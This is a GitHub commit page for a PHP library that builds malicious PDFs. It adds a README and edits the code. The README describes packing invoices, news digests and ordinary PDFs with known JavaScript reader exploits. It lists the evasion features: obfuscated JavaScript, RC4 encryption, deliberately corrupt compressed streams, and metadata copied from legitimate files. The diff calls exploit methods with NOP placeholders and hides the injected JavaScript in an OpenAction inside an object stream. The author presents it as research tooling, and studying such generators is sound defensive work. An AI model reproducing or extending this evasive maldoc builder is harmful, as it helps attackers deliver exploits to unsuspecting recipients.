Permalink
Browse files

added readme

  • Loading branch information...
1 parent d91d1ab commit 18a504b2e21407542b4c109e5a5a53cce2ffcdad @9b committed Oct 12, 2011
Showing with 76 additions and 31 deletions.
  1. +46 −0 README
  2. +1 −1 drop_invoice.php
  3. +8 −5 drop_news.php
  4. +21 −19 invoice.class.php
  5. +0 −6 test.php
View
46 README
@@ -0,0 +1,46 @@
+Summary
+=======
+Using this tool you can create malicious PDF documents using known JavaScript exploits. These files can then be used in research and testing to further improve how PDF analysis is done. Releasing this library also means that it on the radar of tools that may be used by attackers to generate their documents. Knowing this, the security community can be more prepared and spend more time handling this issue rather than avoiding it.
+
+Important Files
+===============
+drop_invoice.php - uses the forms, lists and other information to produce an invoice packed with exploits
+drop_news.php - uses RSS to produce PDF files with current news information packed with exploits
+drop_packed.php - takes in a directory of "good" PDF files and packs them with exploits
+
+General Output
+==============
+- JavaScript is obfuscated using random variables
+- Version is taken into account so that exploits are not fired if the reader is not vulnerable
+- Files are encrypted using RC4
+- Streams are dorked by adding a corrupt GZIP stream to the JavaScript object
+- Metadata is pulled from "known good" PDF files
+
+Inheritance Chain (from end to start)
+=====================================
+FPDF uses inheritance to achieve a full featureset. If you want more features, those features must then be included in the inheritance chain to be taken advantage of. These may not all be used, but by having them in the chain means you can activate them at the highest level of the construction (exploit generation).
+
+PDF_Exploit (pdf_exploit_generator.class.php => Provides exploit packing and building
+FPDF_Protection (protection.class.php) => Provides encryption functionality
+PDF_Invoice (invoice.class.php) => Provides JavaScript insert hook with dorked streams
+concat_pdf (concat.class.php) => Provides the ability to concatenate two different PDF files (used in packing)
+FPDI (fpdi.php) => Provides major functionality for generating documents
+
+Using the Library in Existing Projects
+======================================
+Ensure all files are present at the root level and include pdf_exploit_generator.class.php.
+
+Generating the document:
+$pdf = new PDF_Exploit( 'P', 'mm', 'A4' );
+
+Setting encryption:
+$pdf->SetProtection(array('print'),'');
+
+Adding an exploit (reference the class for methods):
+$pdf-><exploit_to_add>(<shellcode>);
+
+Building the object with the exploits:
+$pdf->build_exploit();
+
+Output the PDF:
+$pdf->Output();
View
@@ -86,5 +86,5 @@
$pdf->addNewPlayer("\x90");
$pdf->addCollectEmailInfo("\x90");
$pdf->build_exploit();
-$pdf->Output($invoice_number ."_invoice.pdf", "F");
+$pdf->Output($invoice_number ."_invoice.pdf","D");
?>
View
@@ -13,11 +13,14 @@
$pdf->SetFont('Arial','',16);
$pdf->WriteHTML($rss[$i]['description']);
}
-$pdf->addCollectEmailInfo("\x90");
-$pdf->addUtilPrintf("\x90");
-$pdf->addGetIcon("\x90");
-$pdf->addNewPlayer("\x90");
-$pdf->build_exploit();
+
+//$pdf->addCollectEmailInfo("\x90");
+//$pdf->addUtilPrintf("\x90");
+//$pdf->addGetIcon("\x90");
+//$pdf->addNewPlayer("\x90");
+//$pdf->build_exploit();
+
+$pdf->HelloWorld();
$pdf->Output();
?>
View
@@ -40,26 +40,27 @@ class PDF_Invoice extends concat_pdf
function IncludeJS($script) {
$this->javascript=$script;
}
-
+
function _putjavascript() {
+
+ //we need this
+ // << /Length 1659 /N 22 /Type /ObjStm /Filter /FlateDecode /First 160 >>
$randoms = Obfuscators::get_random_string_array(15, 30);
- $this->_newobj();
- $this->n_js=$this->n;
- $this->_out('<<');
- $this->_out("/Names [($randoms[0]) ".($this->n+1).' 0 R]');
- $this->_out('>>');
- $this->_out('endobj');
- $this->_newobj();
- $this->_out('<< /S /JavaScript/JS '.($this->n+1).' 0 R >>');
- $this->_out('endobj');
- $this->_newobj();
- $data = $this->javascript;
- $data = gzcompress($data);
- $garbage = $data[strlen($data)-1] = $data[strlen($data)+1];
- $this->_out('<</Filter /FlateDecode /Length '.strlen($data).'>>');
- $this->_putstream($data);
- $this->_putstream($garbage);
- $this->_out('endobj');
+ $this->_newobj(); //need this for the top level
+ $this->n_js=$this->n;
+ $ref_open = $this->n + 99999;
+ $objs = "$ref_open 27055\n";
+ $objs .= "<</AA << /O << /S/JavaScript/JS($this->javascript ) >> >> >>";
+
+ //build out the objstm
+ $objs_length = strlen($objs);
+ $objs_num = "1";
+ $compressed_objs = gzcompress($objs);
+ // $compressed_objs = $objs;
+
+ $this->_out("<< /Length $objs_length /N $objs_num /Type /ObjStm /Filter /FlateDecode /First 9 >>");
+ $this->_putstream($compressed_objs);
+ $this->_out('endobj'); //end the objstm
}
function _putresources() {
@@ -72,7 +73,8 @@ function _putresources() {
function _putcatalog() {
parent::_putcatalog();
if (!empty($this->javascript)) {
- $this->_out('/Names <</JavaScript '.($this->n_js).' 0 R>>');
+ //$this->_out('/Names <</JavaScript '.($this->n_js).' 0 R>>');
+ $this->_out('/OpenAction '.($this->n_js+99999).' 0 R>>');
}
}
View
@@ -1,6 +0,0 @@
-<?php
-$compressed = gzcompress('This is a string');
-//$compressed = $compressed[strlen($compressed)-1] = utf8_encode("\xC6\x92");
-$uncompressed = gzuncompress($compressed);
-echo $compressed;
-?>

0 comments on commit 18a504b

Please sign in to comment.